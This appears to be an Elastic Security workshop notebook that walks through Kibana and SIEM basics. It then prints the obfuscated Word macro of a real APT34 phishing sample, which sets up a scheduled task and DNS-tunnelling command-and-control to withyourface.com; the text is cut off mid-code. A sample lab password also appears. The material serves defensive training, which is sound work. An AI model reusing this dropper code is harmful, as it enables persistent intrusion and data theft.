<a href="https://colab.research.google.com/github/jamesspi/elastic-security-workshop/blob/master/Security_Workshop_Australia.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

# Lab 0 - Familiarising yourself with the Lab Setup
*Time needed - 5 minutes.*



Welcome to the Elastic Security Workshop! For today's labs, we will be using Strigo, which provides us all with a unique Windows machine which we will be using to simulate an attack victim.

It is important to take note of the following files on the desktop, as laid out in the screenshot below.

![Lab Desktop](https://raw.githubusercontent.com/jamesspi/elastic-security-workshop/master/strigodesktop.png)

We will be referencing these files throughout the different labs.







# Lab 1 - Getting Familiar With Kibana
*Time needed - 5 minutes.*

Kibana is your visual window into the Elastic Stack. It is where you will search and visualise your data, hunt for threats, set up detection rules and machine learning jobs, create alert actions and incident cases, as well as manage and monitor the entire stack.

 
The link to your Kibana instance can be found in the `cluster.txt` file on your desktop.

The contents of the file should look something like:

```
Kibana URL: a2cb0e33c99b4702abe6e59061a7bbe9.australia-southeast1.gcp.elastic-cloud.com
Elasticsearch URL: e2b3490cdd8344f882ba7e21f151ed80.australia-southeast1.gcp.elastic-cloud.com
Cloud ID: :YXVzdHJhbGlhLXNvdXRoZWFzdDEuZ2NwLmVsYXN0aWMtY2xvdWQuY29tJGUyYjM0OTBjZGQ4MzQ0Zjg4MmJhN2UyMWYxNTFlZDgwJGEyY2IwZTMzYzk5YjQ3MDJhYmU2ZTU5MDYxYTdiYmU5
Username: elastic
Password: pXYiOQlraz0UgpWjhVxoLT6c
```

Please copy the Kibana URL to go started, and log in with the supplied credentials (you may need to prepend https to the kibana URL, depending on your browser).

![alt text](https://github.com/jamesspi/elastic-security-workshop/raw/master/strigocopy.gif)

After logging in, you will be presented with the kibana home screen. Feel free to spend some time going through the highlighted sections before proceeding. 

![alt text](https://raw.githubusercontent.com/jamesspi/elastic-security-workshop/master/kibanaoverview.png)





# Lab 2 - Elastic SIEM
*Time needed - 15 minutes.*

Let's take a deeper look at the layout and functionality of Elastic SIEM. Please navigate to Elastic SIEM in your kibana instance.

Let's start off by examining the `Overview` page.

### SIEM Overview Page

![alt text](https://raw.githubusercontent.com/jamesspi/elastic-security-workshop/master/siemoverview.png)

The overview page contains a search bar and a timepicker (the same as you will find in any other part of kibana) histograms of signals, external alerts, and events, a breakdown of the event types we are ingesting, recent cases and timelines, as well as a real time news feed maintained by the Elastic security teams.



*   **The search bar and time picker:** Kibana uses a query language known as KQL (kibana query language). You can apply a search here to filter for specific events you may be interested in. For example:

       `host.name:myhostname.local and source.ip:10.30.0.0/16`

*   **Signal Count:** Signals are events which Elastic SIEM has detected as being potentially malicious, based off of the inbuilt set of detection rules, or any custom rules that a user has created. The histogram allows you to change the stacking of the chart based on user preference.

![alt text](https://raw.githubusercontent.com/jamesspi/elastic-security-workshop/master/signalsstack.gif)

*   **External Alerts:** You can ship any logs and events that you like to the Elastic stack, including those from other security vendors which may have their own rule sets (IDS/IPS, WAF, AV/Endpoint solutions, etc). We visualise these in a separate chart that we label as external alerts. This chart will get populated by any logs/events which contain the field `event.kind: alert`. As part of these excercises, we will not have any external alerts, however, here is an example of a populated chart below:

![alt text](https://github.com/jamesspi/elastic-security-workshop/raw/master/externalalerts.gif)

*   **Events:** A breakdown of the events being sent to our stack, in use by the SIEM. 

![alt text](https://github.com/jamesspi/elastic-security-workshop/raw/master/Screenshot%202020-05-25%20at%2011.35.51.png)

*   **Recent Cases and Timelines:** As users of the SIEM start threat hunting and investigating incidents, the recent timelines and cases will show up here. We will get into more detail on the concept of a timeline (hunt/investigation) and a case (incident) in upcoming excercises.

![alt text](https://github.com/jamesspi/elastic-security-workshop/raw/master/Screenshot%202020-05-25%20at%2011.51.14.png)

*   **Security News Feed:** As the different security teams at Elastic discover new threats, release new features, or publish new content, they will push them directly to this live feed so that they get into the hands of the analysts immediately. 

![alt text](https://github.com/jamesspi/elastic-security-workshop/raw/master/feedshort.png)











#**Lab 3 - Malware Detonations and Hunting**

_Time needed - 30-45 minutes_

### **Malware sample details**


Let's kick things off by running a powershell script that simulates a real malware sample from the group known as Helix or APT34.

In the real campaign, the payload was delivered to victims via a phishing e-mail with a word document attached. The document contained several macros that performed a number of adversarial behaviours.

Below are two screenshots of the actual e-mail content and word document.

![alt text](https://github.com/jamesspi/elastic-security-workshop/raw/master/apt341.png)

![alt text](https://github.com/jamesspi/elastic-security-workshop/raw/master/apt342.png)

The actual code found in the word macros is also below:

```
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Call VVVV
Call AAAA
End Sub
Sub AAAA()
Dim A As String
A = "DIM fso   " & vbCrLf & "Set fso = CreateObject(""Scripting.FileSystemObject"") " & vbCrLf & "set Shell0 = CreateObject(""wscript.shell"")" & vbCrLf & "If (fso.FileExists(""C:\ProgramData\WindowsAppPool\quid"")) Then" & vbCrLf & "  Shell0.run """
A = A + Chr(CLng("&H70")) & Chr(CLng("&H6F")) & Chr(CLng("&H77")) & Chr(CLng("&H65")) & Chr(CLng("&H72")) & Chr(CLng("&H73")) & Chr(CLng("&H68")) & Chr(CLng("&H65")) & Chr(CLng("&H6C")) & Chr(CLng("&H6C")) & Chr(CLng("&H2E")) & Chr(CLng("&H65")) & Chr(CLng("&H78")) & Chr(CLng("&H65"))
A = A + " -exec bypass -file C:\ProgramData\WindowsAppPool\AppPool.ps1 "", 0, false" & vbCrLf & "Else" & vbCrLf & "Shell0.run """ & Chr(CLng("&H63")) & Chr(CLng("&H6D")) & Chr(CLng("&H64")) & Chr(CLng("&H2E")) & Chr(CLng("&H65")) & Chr(CLng("&H78")) & Chr(CLng("&H65"))
A = A + " /C schtasks /create /F /sc minute /mo 1 /tn """"\WindowsAppPool\AppPool"""" /tr """"wscript /b """"C:\ProgramData\WindowsAppPool\AppPool.vbs"""""""""", 0,false" & vbCrLf & "Shell0.run """
A = A + Chr(CLng("&H70")) & Chr(CLng("&H6F")) & Chr(CLng("&H77")) & Chr(CLng("&H65")) & Chr(CLng("&H72")) & Chr(CLng("&H73")) & Chr(CLng("&H68")) & Chr(CLng("&H65")) & Chr(CLng("&H6C")) & Chr(CLng("&H6C")) & Chr(CLng("&H2E")) & Chr(CLng("&H65")) & Chr(CLng("&H78")) & Chr(CLng("&H65"))
A = A + " -exec bypass -file C:\ProgramData\WindowsAppPool\AppPool.ps1 "", 0, false" & vbCrLf & "End If" & vbCrLf & "Wscript.Quit(intOK)"
Open "C:\ProgramData\WindowsAppPool\AppPool.vbs" For Output As #1
Print #1, A
Close #1
Call HGHG
Call Shell(Chr(CLng("&H77")) & Chr(CLng("&H73")) & Chr(CLng("&H63")) & Chr(CLng("&H72")) & Chr(CLng("&H69")) & Chr(CLng("&H70")) & Chr(CLng("&H74")) & Chr(CLng("&H20")) & "C:\ProgramData\WindowsAppPool\AppPool.vbs", vbNormalFocus)
End Sub
Sub VVVV()
    Dim fdObj As Object
    Application.ScreenUpdating = False
    Set fdObj = CreateObject("Scripting.FileSystemObject")
    If fdObj.FolderExists("C:\ProgramData\WindowsAppPool") Then
    Else
        fdObj.CreateFolder ("C:\ProgramData\WindowsAppPool")
    End If
    Application.ScreenUpdating = True
End Sub

Sub HGHG()
Dim sss As String
sss = sss + "(('SGFMMC = '+'X9Pwithyourface.comX9P;" & vbCrLf & "SGFNNC = X9PC:MxaProgramDataMxaWindowsAppPoolX9P;'+'" & vbCrLf & "if (-not (Te'+'st-Path SGFNNC))'+' { md SGFN'+'NC; }" & vbCrLf & "SGFOOC = SGFNNC'+' + X9PMxaquidX9P;" & vbCrLf & "SGFPPC = SGFNNC + X9PMxalockX9P;" & vbCrLf & "'+'if (!(Test-Path SGFPPC)){sc -P'+'ath SGFPPC -Value SGFpid;}" & vbCrLf & "else" & vbCrLf & "{" & vbCrLf & "   SGFQQC = (NEW-TI'+'MESPA'+'N -Start ((Get-C'+'hildItem SGFPPC).CreationTime) -End (Get-Date)).Minute'+'s" & vbCrLf & "  if (SGFQQC -gt 10)" & vbCrLf & "    {" & vbCrLf & " stop-proces'+'s -'+'i'+'d (gc SGFPPC);" & vbCrLf & "    ri '+'-Path SGFPPC;" & vbCrLf & "   }" & vbCrLf & " return;" & vbCrLf & "}'+'" & vbCrLf & "SGFRRC ='+' get-content SGFOOC;" & vbCrLf & "SGFS'+'SC = Get-Random -InputObject (10 .. 99);" & vbCrLf
sss = sss + "if (SGFRRC.length -ne 10) { SGFRRC = SGFSSC.ToString() + [guid]::NewGuid().toString().replace(ZxV-ZxV, ZxVZxV).substring(0, 8); SGFRRC 7r'+'n sc SG'+'FOOC }" & vbCrLf & "gi SGFOOC -Force 7rn %{ SGF_.Attributes = X9PHiddenX9P }" & vbCrLf & "SGF{global:SGFTTC} = 0;" & vbCrLf & "'+'" & vbCrLf & "function UUC (SGFVVC, SGFWWC, SGFXXC, SGFYY'+'C, SGFZZC, SGFAAD)" & vbCrLf & "{" & vbCrLf & "   SGFBBD = -joi'+'n ((48 .. 57)+(65 .. 70) 7rn Get-Random  -Count (%{ Get-Random -Inp'+'ut'+'Object (1 .. 7) }) 7rn %{ [char]SGF_ });" & vbCrLf & "   SGFCCD = Get-Random -InputObject (0 .. 9) -Count 2;" & vbCrLf & "   SGFDDD = SGFRRC.Insert((SGFCCD['+'1]), SGFWWC).Insert(SGFCCD[0], SGFVVC);" & vbCrLf & " if (SGFZZC -eq X9PsX9P)" & vbCrLf & "   { return X9PSGF(SGFDDD)SG'+'F(SGFAAD)'+'SGF(SGFBBD)CSGF(SGFCCD[0])SGF(SGFCCD[1])T.SGFXXC.SGFYYC.SGFMMCX9P; }" & vbCrLf & "  else " & vbCrLf & " { return X9PSGF(SGFDDD)SGF'+'(SGFAAD)SGF(SGFBBD)CSGF(SGFC'+'CD[0])SGF(SGFCCD[1])T.SGF(SGFMMC)X9P;}" & vbCrLf
sss = sss + "}" & vbCrLf & "fu'+'nction EED()" & vbCrLf & "{" & vbCrLf & "  SGFFFD = SGFnull;" & vbCrLf & " try" & vbCrLf & "   {" & vbCrLf & " SGFFFD = ((Get-'+'WmiObject Win32_Networ'+'kAdapterConfig'+'uration -ComputerName SGFen'+'v:computername -E'+'A Stop 7rn ? { SGF_.IPEnabled }).DNSServerSearchOrder)[0] 7rn Out-String" & vbCrLf & "    }" & vbCrLf & " catch [exception] {" & vbCrLf & "   #Write-Host SGF_.Message" & vbCrLf & "  }" & vbCrLf & " if (!SGFFFD)" & vbCrLf & "  {" & vbCrLf & " try" & vbCrLf & "   {" & vbCrLf & " SGFns = nslook'+'up.exe 8.8.8.8;" & vbCrLf & "  SGFFFD = (SGFns[1] -split ZxV:ZxV)[1].Trim();" & vbCrLf & " }" & vbCrLf & " catch [exception] {" & vbCrLf & "   #Write-Host SGF_.Message" & vbCrLf & "  }" & vbCrLf & " }" & vbCrLf & " re'+'turn SGFFFD" & vbCrLf & "}" & vbCrLf & "function GGD (SGFHHD'+')" & vbCrLf & "{" & vbCrLf & "  SGFip = EED" & vbCrLf & "   SGFars = ['+'system.net.IPAddress]::Parse([System.Net.Dns]::GetHostAddresses(SGFMMC));" & vbCrLf
sss = sss + "   SGFend = New-Object System.Net.IPEndPoint SGFars, 53" & vbCrLf & "  SGFs = Ne'+'w-Object System.Net.Sock'+'ets.UdpClient" & vbCrLf & "  SGFs.Client.Rece'+'iveTimeout = SGFs.Client.SendTimeout = 1500'+'0" & vbCrLf & "    SGFs.Connect(SGFend)" & vbCrLf & "  SGFpre = (0xa4, 0xa3, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0'+'x00, 0x00)" & vbCrLf & "  if (!SGFHHD.StartsWith(ZxV.ZxV)) { SGFHHD = X9P.X9P + '+'SGFHHD; }" & vbCrLf & "    if (!SGFHHD.EndsWith(ZxV.ZxV)) { SGFHHD'+' = SGFHHD + X9P.X9P; }" & vbCrLf & "  SGFmb = [System'+'.Text.Encoding]::ASCII.GetBytes(SGFHHD)" & vbCrLf & " SGFp = SGFHHD.Split(ZxV.ZxV)" & vbCrLf & "  SGFpi = 1" & vbCrLf & " '+'for (SGFi = 0; SGFi -lt SGFmb.length; SGFi++) { if (SGFmb[SGFi] -eq 0x2e) { SGFmb[SGF'+'i] = SGFp[SGFpi].Length; SGFpi++ } }" & vbCrLf & "   SGFpre'+' += SGFmb" & vbCrLf & "    SGFpre += (0x00, 0x10, 0x00, 0x01)" & vbCrLf & "    SGFbuf = SGFpr'+'e" & vbCrLf & "    SGFSent = SG'+'Fs.Send(SGFbuf, SGFbuf.Length)" & vbCrLf
sss = sss + "   SGFrb = SGFs.Receive([re'+'f]SGFend)" & vbCrLf & "  SGFr = [byte[]]( ,0x0 * (SGFrb.length - (SGFmb.length + 29)))" & vbCrLf & " [System.Buffer]::Bl'+'ockCopy(SGFrb, SGFmb.length + 29, SGFr,'+' 0, (SGFrb.length - (SGFmb.length + 29))'+')" & vbCrLf & "  return SGFr'+'" & vbCrLf & "}" & vbCrLf & "function '+'IID (SGFHHD)" & vbCrLf & "{" & vbCrLf & "    SGFip = EED" & vbCrLf & "   SGFars = [system.net.IPAddress]::Parse([System.Net.Dns]::Get'+'HostAddresses(SGFMMC)'+');" & vbCrLf & " SGFend = New-Object Syste'+'m.Net.I'+'PEnd'+'Point SGFars, 53" & vbCrLf & " SGFs = New-Object System.Net.Sockets.UdpClient" & vbCrLf & "    SGFs.Client.ReceiveTimeo'+'ut = SGFs.Client.SendTimeout = 15000" & vbCrLf & "   SGFs.Connect(SGFend)" & vbCrLf & "  SGFpre = (0xa4, 0xa3, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00)" & vbCrLf & " if (!SGFHHD.StartsWith(ZxV.ZxV)) { SGFHHD = X9P.X9P + SGFHHD; }" & vbCrLf & "   if (!SGFHHD.EndsWith(ZxV.ZxV)) { SGFHHD = SGF'+'HHD + X9P.X9P; }" & vbCrLf
sss = sss + "   SGFmb = [System.Text.Encoding]::ASCII.GetBytes(SGFHH'+'D)" & vbCrLf & " SGFp = SG'+'FHHD.Split(ZxV.ZxV)" & vbCrLf & "   SGFpi = 1" & vbCrLf & " for'+' (SGFi = 0; SGFi -lt SGFmb.length; SGFi'+'++) { if (SGFmb[SGFi] -eq 0x2e) { SGFmb[SGFi] = SGFp[SGFpi].Length; SGFpi++ } }" & vbCrLf & "   SGFpre += SGFmb" & vbCrLf & "   SGFpre += (0x00, 0x01, 0x00, 0x01)" & vbCrLf & "    SGFbuf = SGFpre" & vbCrLf & "   SGFSent = SGFs.Send(SGFbuf, SGFbuf.Length)" & vbCrLf & "    SGFrb = SGFs.Receive([ref]SGFend)" & vbCrLf & " SGFr = [byte[]]( ,0x0 * (SGFrb.length - (SGFmb.lengt'+'h + 28)))" & vbCrLf & "  [System.Buffer]::BlockCopy(SGFrb, SGFmb.len'+'gth + 28, SGFr'+', 0, (SGF'+'rb.length - (SGFmb.length + 28)))" & vbCrLf & "  retu'+'rn SGFr" & vbCrLf & "}" & vbCrLf & "function JJD" & vbCrLf & "{" & vbCrLf & "    SGFKKD = SGFfalse;" & vbCrLf & "    SGFLLD = 0;" & vbCrLf & "   SGFMMD = SGF{glob'+'al:SGFNND}'+' + X9PMxaX9P;" & vbCrLf & "    SGFOOD = @();" & vbCrLf & " SGFPPD = X9P000X9P;" & vbCrLf
sss = sss + "   '+'SGFQQD = X9P0X9P;" & vbCrLf & "  SGF{global:SGFRRD} = SGFtru'+'e;'+'" & vbCrLf & "   SGF{global:SGFSSD} = 0;" & vbCrLf & "   SGF{global:SGF'+'SGFTTD} = 5;'+'" & vbCrLf & "  " & vbCrLf & "  While (SGF{global:SGFRRD})" & vbCrLf & "    {" & vbCrLf & " St'+'art-Sleep -m 50;" & vbCrLf & " if (SG'+'F'+'{global:SGFSSD} -gt SGF{global:SGFSGFTTD}) { break }" & vbCrLf & " if (SGFLLD -eq [int]SGFPPD) { SGF{global:SGFSSD}++ }" & vbCrLf & "  if (SGFLLD -lt 10) '+'{ SGFPPD = X9P00SGF(SGFLLD)X9P; '+'}" & vbCrLf & "    elseif (SGFLLD -lt 100) { SGFPPD = X9P0SGF(SGFLLD)X9P;'+' }" & vbCrLf & "   else { SGFPPD = X9PSGF(SGFLLD)X9P; }" & vbCrLf & "  SGFUUD = UUC SGFPPD SGFQQD '+'X9PX9P X9PX9P X9PrX9P" & vbCrLf & "   try" & vbCrLf & "   {" & vbCrLf & " Write-Host SGF'+'UUD;" & vbCrLf & " SGFVVD = [System.Net.Dns]::GetHostAddresses(SGFUUD);" & vbCrLf & "  Write-Host SGFVVD;" & vbCrLf & "    '+' }" & vbCrLf & " catch [Except'+'ion]" & vbCrLf & "  {" & vbCrLf
sss = sss + "   echo SGF_.Exception.GetType().FullName, SGF_.Exception.Message; Write-Host X9Pexcepton occured!X9P; SGF{global:SGFSSD}++; continue;" & vbCrLf & "   }" & vbCrLf & " " & vbCrLf & "  if (SGFVVD -eq SGFnull)" & vbCrLf & "   {" & vbCrLf & " SGF{global:SGFSSD} = SGF{global:SGFSSD} + 1;" & vbCrLf & "  continue;" & vbCrLf & " }" & vbCrLf & " SGFWWD = SGFVVD[0].IPAddressToString.Split(ZxV.ZxV);" & vbCrLf & "  Write-Host X9PSGF(SGFLLD'+'):SGF(SGFW'+'WD[3])VOltsaveing_mode: S'+'GF(SGFKKD)VOl'+'t '+'  S'+'GF(SGFWWD[0]) SGF(SGFWWD[1]) SGF'+'(SGFWWD[2])X9P" & vbCrLf & "  if ((SGFWWD[0] -eq 1) -and (SGFWWD[1]'+' -eq 2) -and'+' (SGFWWD[2] -eq 3))" & vbCrLf & "    {" & vbCrLf & " SGFKKD = SGFfalse;" & vbCrLf & "    SGFQQD ='+' X9P0'+'X9P;" & vbCrLf & "   SGFlen = SGFOOD.Length" & vbCrLf & "    '+' if (SGFOOD[SGFlen - 1] -e'+'q 0 -and SGFOOD[SGF'+'len - 2] -eq 0)" & vbCrLf & " {" & vbCrLf & " SG'+'FXXD = SGFOOD[0 .. (SGFlen - 3)];" & vbCrLf & "    }" & vbCrLf
sss = sss + "   elsei'+'f (SGFOOD[SGFlen - 1] -eq 0)" & vbCrLf & "  {" & vbCrLf & " SGFXXD = SGFOOD[0 .. (SGFlen - 2)];" & vbCrLf & "   }" & vbCrLf & " e'+'lse" & vbCrLf & "   {" & vbCrLf & "'+'" & vbCrLf & "    SGFXXD = SGFOOD;" & vbCrLf & "  }" & vbCrLf & " [System.IO.File]:'+':WriteAllBytes(SG'+'FMMD, SGFXXD);" & vbCrLf & "    SGFOOD = @();" & vbCrLf & " SGFXXD = @();" & vbCrLf & " SGFLLD = 0;" & vbCrLf & "   SGF{global:SGFRRD} = SGFfalse;" & vbCrLf & "    }" & vbCrLf & " " & vbCrLf & "  if (SGFKKD)" & vbCrLf & "   {" & vbCrLf & " if (SGFLLD -gt 250) { SGFLLD = 0; }" & vbCrLf & "   if (SGFLLD -eq SGFWWD[3]'+')" & vbCrLf & "  {" & vbCrLf & " SGFOOD += SGFWWD[0];" & vbCrLf & "  SG'+'FOOD += SGFWWD[1]'+';" & vbCrLf & "    SGFOOD += SGFWWD'+'[2];" & vbCrLf & "'+'    SGFLLD = SGFLLD + 3'+';" & vbCrLf & "   }" & vbCrLf & " }" & vbCrLf & " " & vbCrLf & "  if ((SGF'+'WWD[0] -eq 24) -and (SGF'+'WWD[1] -eq 125'+'))" & vbCrLf & " {" & vbCrLf
sss = sss + "   SGFMMD += X9PrcvdX9P + SGFWWD[2] + X9PX9P + SGFWWD[3];" & vbCrLf & "    SGFKKD = SGFtrue;" & vbCrLf & " SGFQQD = X9P1X9P;" & vbCrLf & " SGFLLD = 0;" & vbCrLf & "   }" & vbCrLf & " '+' " & vbCrLf & "  if ((SGFWWD[0] -eq 11) -and (SGFWWD[1] -eq 24) -and (SGFWWD[2] -eq 237)'+' -and (S'+'GFW'+'WD[3] -eq 110)) # kill '+'this process" & vbCrLf & " {" & vbCrLf & " SGF{global:SGFRRD} = SGFfalse;" & vbCrLf & "    SGF{global:SGFSSD} = SGF{global:SGFSSD} + 1;" & vbCrLf & "  }" & vbCrLf & " }" & vbCrLf & " Start-Sleep -s 1;" & vbCrLf & "}" & vbCrLf & "function'+' YYD" & vbCrLf & "{" & vbCrLf & "  SGFbyts = @(); SGFct = 0; SGFfb '+'= @(); SGFrn = X9P000X9P; SGFZZD = X9PWX'+'9P; SGFrun = SGFtrue; SGFAAE = SGF{global:SGFNND} + X9PMxaX9P;" & vbCrLf & "  SGFBBE = 0;" & vbCrLf & "   While (SGFrun)" & vbCrLf & "    {" & vbCrLf & " Start-S'+'leep -m 50;" & vbCrLf & " if (SG'+'FBBE -gt 5){ SGFrun = SGFfalse;'+' }" & vbCrLf & " if'+' (SGFct -lt 10){SGFrn = X9P000SGF(SGFct)X9P;}" & vbCrLf
sss = sss + "   elseif (SGFct -lt 100){SGFrn = X9P00SGF(SGFct)X9P;}" & vbCrLf & "   elseif (SGFct -lt 1000){SGFrn = X'+'9P0SGF(SGFct)X9P;}" & vbCrLf & "    els'+'e{SGFrn = X9PSGF(SGFct)X9P;}" & vbCrLf & "'+' try" & vbCrLf & "'+'" & vbCrLf & "  {" & vbCrLf & " SGFCCE = UUC X9P000X9P '+'SGFZZ'+'D X9PX9P'+' X9PX9P '+'X9PrX9P SGFrn" & vbCrLf & " '+' SGFtmp = GGD(SGFCCE);" & vbCrLf & " SG'+'Fres = '+'[System.Text.Encodin'+'g]::'+'ASCII.GetString(SGFtmp);" & vbCrLf & " }" & vbCrLf & " catch [exception] { Write-Host SGF_; SGF'+'BBE++; SGF{glo'+'bal:SGFTTC}++; cont'+'inue; }" & vbCrLf & " if ([string]::IsNullOrEmpty(SGFres)) { SGFBBE++; SGF{global:SGFTTC}++; continue;}" & vbCrLf & " SGFrs = SGFres.Split(ZxV>ZxV);" & vbCrLf & "    SGFdata = X9PX9P;" & vbCrLf & " For (SGFi = 0; SGFi -le SGFrs[1].Length; SGFi++) { if (SG'+'Frs[1][SGFi] -lt 125 -and SGFrs[1][SGFi] -gt 41) { SGFdata += SGFrs[1][SGFi]; } }" & vbCrLf & " if (SGFrs'+'[0][0] -eq X9PNX9P)" & vbCrLf & "   {" & vbCrLf
sss = sss + "   SGFZZD = X9PWX9P;" & vbCrLf & " SGFBBE++;" & vbCrLf & " continu'+'e;" & vbCrLf & "  '+' }" & vbCrLf & " if (SGFrs[0] -eq X9PS000sX9P)" & vbCrLf & " {" & vbCrLf & " SGFBBE = 0;" & vbCrLf & "   '+' SGFZZD = X9PDX9P;" & vbCrLf & " SGFAAE'+' += (X9PrcvdX9P+SGFdata);" & vbCrLf & "    SGFct = 0;" & vbCrLf & "    continue;" & vbCrLf & " }" & vbCrLf & " if (SGFrs['+'0][0] '+'-eq ZxVSZxV -'+'and -not'+' (SGFfb'+' -contains SGFrs[0]))" & vbCrLf & "  '+' {'+'" & vbCrLf & "  SGFZZD = X9PDX9P;" & vbCrLf & " if (SGFrs[0].EndsWith(SGFrn))" & vbCrLf & " {" & vbCrLf & " t'+'ry" & vbCrLf & "    {" & vbCrLf & " '+' SGFtmp = SGFdata.Replace(ZxV-ZxV, ZxV+ZxV).Replace(ZxV_'+'ZxV, ZxV/ZxV);" & vbCrLf & "  '+' SGFbyts += [System.Convert]::FromBase64String(SGFtmp);" & vbCrLf & "    SGFct++;" & vbCrLf & "  SGF'+'fb'+' += SGFrs[0];" & vbCrLf & "  }" & vbCrLf & " catch" & vbCrLf & " {" & vbCrLf & " Write-Host X9PException in receiver_X9P+SGF'+'_;" & vbCrLf & "  }" & vbCrLf & " }" & vbCrLf & " }" & vbCrLf
sss = sss + "   if (SGFrs[0].StartsWith(X9PEX9P))" & vbCrLf & " {" & vbCrLf & " [System.IO'+'.File]::WriteA'+'llBytes(SGFAAE, SGFbyts);" & vbCrLf & "   break;" & vbCrLf & "    }" & vbCrLf & " if (SGFrs[0].StartsWith(X9PCX9P))" & vbCrLf & " {" & vbCrLf & " SGFct = 0; SGFrun = SGFf'+'alse;" & vbCrLf & "  }" & vbCrLf & " }" & vbCrLf & "}" & vbCrLf & "function DDE(SGFEEE)" & vbCrLf & "{" & vbCrLf & " SGFLLD = 0;" & vbCrLf & "   SGFFFE = @(gci -path (SGF{global:SGFGGE}+X9PMxaproc*X9'+'P) 7rn ? { !SGF_.PSIsContainer });" & vbCrLf & "   if (SGFFFE -ne SGFnull)" & vbCrLf & "   {" & vbCrLf & " " & vbCrLf & "  SGFHHE ='+' SGFFFE[0].ToString().'+'Substring(SGFFFE[0'+'].ToStrin'+'g().L'+'e'+'ngth - 5)" & vbCrLf & "    SGFIIE = SGF'+'{gl'+'obal:SGFGGE} + X9PMxaX9P + SGFHHE;'+'" & vbCrLf & "    rni SGFFFE[0] S'+'GFIIE -'+'Force" & vbCrLf & " SGFJJE = slaber'+' SGFIIE;" & vbCrLf & "    if ([int]SGFJ'+'JE.Length -le 0) { rd -path SGFIIE;return; }" & vbCrLf & "  SGFKKE = 60;" & vbCrLf
sss = sss + "   SGFLLE = X9P*X9P * 54;" & vbCrLf & "    SGFLLE = Split-path SGFIIE -Leaf 7rn % { SGFLLE.Insert(0, SGF_) } 7rn %'+' { SGF_.Insert(6, SGFJJE.Length) } 7rn'+' '+'%{ SGF_[0 .. 26] -join X9PX9P };" & vbCrLf & "   SGFLLE = -join (SGFLLE 7rn % { resolver S'+'GF_ })" & vbCrLf & "    SGFMME = X9PCOCTabX9P + SGFLLE;" & vbCrLf & "   SGFJJE = SGFMME + SGFJJE;" & vbCrLf & " '+'SGFNNE = X9P000X9P;" & vbCrLf & "    SGFQQD = X9P2X9P;" & vbCrLf & " SGFOOE = 0;" & vbCrLf & "'+'" & vbCrLf & "  SGFPPE = SGFtrue;" & vbCrLf & " SGF{global:SGFRRD} '+'= SGFtrue;" & vbCrLf & "  SGFQQE = SGFtrue;" & vbCrLf & " SGF{global:SGFSSD} = 0;" & vbCrLf & "   '+' SGF'+'{global:SGFTTD} = 5;" & vbCrLf & "    " & vbCrLf & "  While (SGF{global'+':SGFRRD})" & vbCrLf & " {" & vbCrLf & " Start-Sleep -m 10;" & vbCrLf & "    if (SGF{global:SGFSSD} -gt SGF{global:SGFTT'+'D})" & vbCrLf & " {" & vbCrLf & " SGFRRE = SGF{gl'+'obal:SGFGGE} + X9PMxaprocX'+'9P + SGFHHE;'+'" & vbCrLf & "    '+' rni SGFIIE SGFRRE -Force;" & vbCrLf
sss = sss + "   break;" & vbCrLf & "    }" & vbCrLf & " " & vbCrLf & "'+'   if (SGFLLD -lt 10) { SGFNNE = X9P00SGF(SGFLLD)X9P; }" & vbCrLf & "  elseif (SGFLLD -lt 100) { SGFNNE = X9P0SGF(SGFLLD)X9P; }" & vbCrLf & "  else { SGFNNE = X9PSGF(SGFLL'+'D)X9P; }" & vbCrLf & "   " & vbCrLf & "  if (SGFL'+'LD -eq 250)" & vbCrLf & "    {" & vbCrLf & " if (SGFPPE)" & vbCrLf & "   {" & vbCrLf & " SGFOOE += 250;" & vbCrLf & "    }" & vbCrLf & " SGFLLD = 0; SGFPPE = SGFfalse;" & vbCrLf & "    }" & vbCrLf & " if (SGFLLD -eq 200) { SGFPPE = SGFtrue; }" & vbCrLf & " " & vbCrLf & "  if (SGFJJE.Length -gt SGFKKE)" & vbCrLf & " {" & vbCrLf & " if ((SGFJJE.L'+'ength - SGFKKE * (SGFLLD + SGFOOE)) -ge SG'+'FKKE)" & vbCrLf & "    {" & vbCrLf & " SGFSSE = SG'+'FJJE.Substring(SGFKKE * (SGFLLD + SGFOOE), SGFKKE);" & vbCrLf & " }" & vbCrLf & " elseif ((SGFJJE.Len'+'gth - SGFKKE * (SGFLLD + SGFOOE)) -gt 0)" & vbCrLf & "    {" & vbCrLf
sss = sss + "SGFSSE = SGFJJE.Substring(SGFKKE * (SGFLLD + SGFOOE), (SGFJJE.Length - SGFKKE * (SGFLLD + SGFOOE)));" & vbCrLf & " }" & vbCrLf & " els'+'e" & vbCrLf & "   {" & vbCrLf & " SGFSSE = X9PCOCTabCOCTX9P;" & vbCrLf & "    SGF'+'{global:SGFRRD} = SGFfalse;" & vbCrLf & "'+'  '+' rd -path SGFIIE -Force;" & vbCrLf & "   }" & vbCrLf & " }" & vbCrLf & " else" & vbCrLf & "  {" & vbCrLf & " SGFSSE = SGFJJE;" & vbCrLf & "  '+' }" & vbCrLf & " SGFTTE = (Split-path SGFIIE '+'-Leaf) + X9P*X9P 7rn % { resolver SGF_ };" & vbCrLf & "  SGFUUD = UUC SGFNNE SGFQQD SGFSSE SGFTTE X9PsX9P X9P0000X9P" & vbCrLf & "   try" & vbCrLf & "   {" & vbCrLf & " if (SG'+'FEEE -lt 3 -and -not (SGFUUE))" & vbCrLf & "   {" & vbCrLf & " '+' '+' SGFVVD = IID('+'SG'+'FUUD);" & vbCrLf & "   }" & vbCrLf & " '+'else" & vbCrLf & "   {" & vbCrLf & " SGFVVD = [System.Net.Dns]::GetHostAddresses(SGFUUD);" & vbCrLf & "  SGFVVD = SGFVVD.I'+'PAddr'+'essToString.Split(ZxV.ZxV)" & vbCrLf & "    }" & vbCrLf & " Write-Host SGFVVD;" & vbCrLf
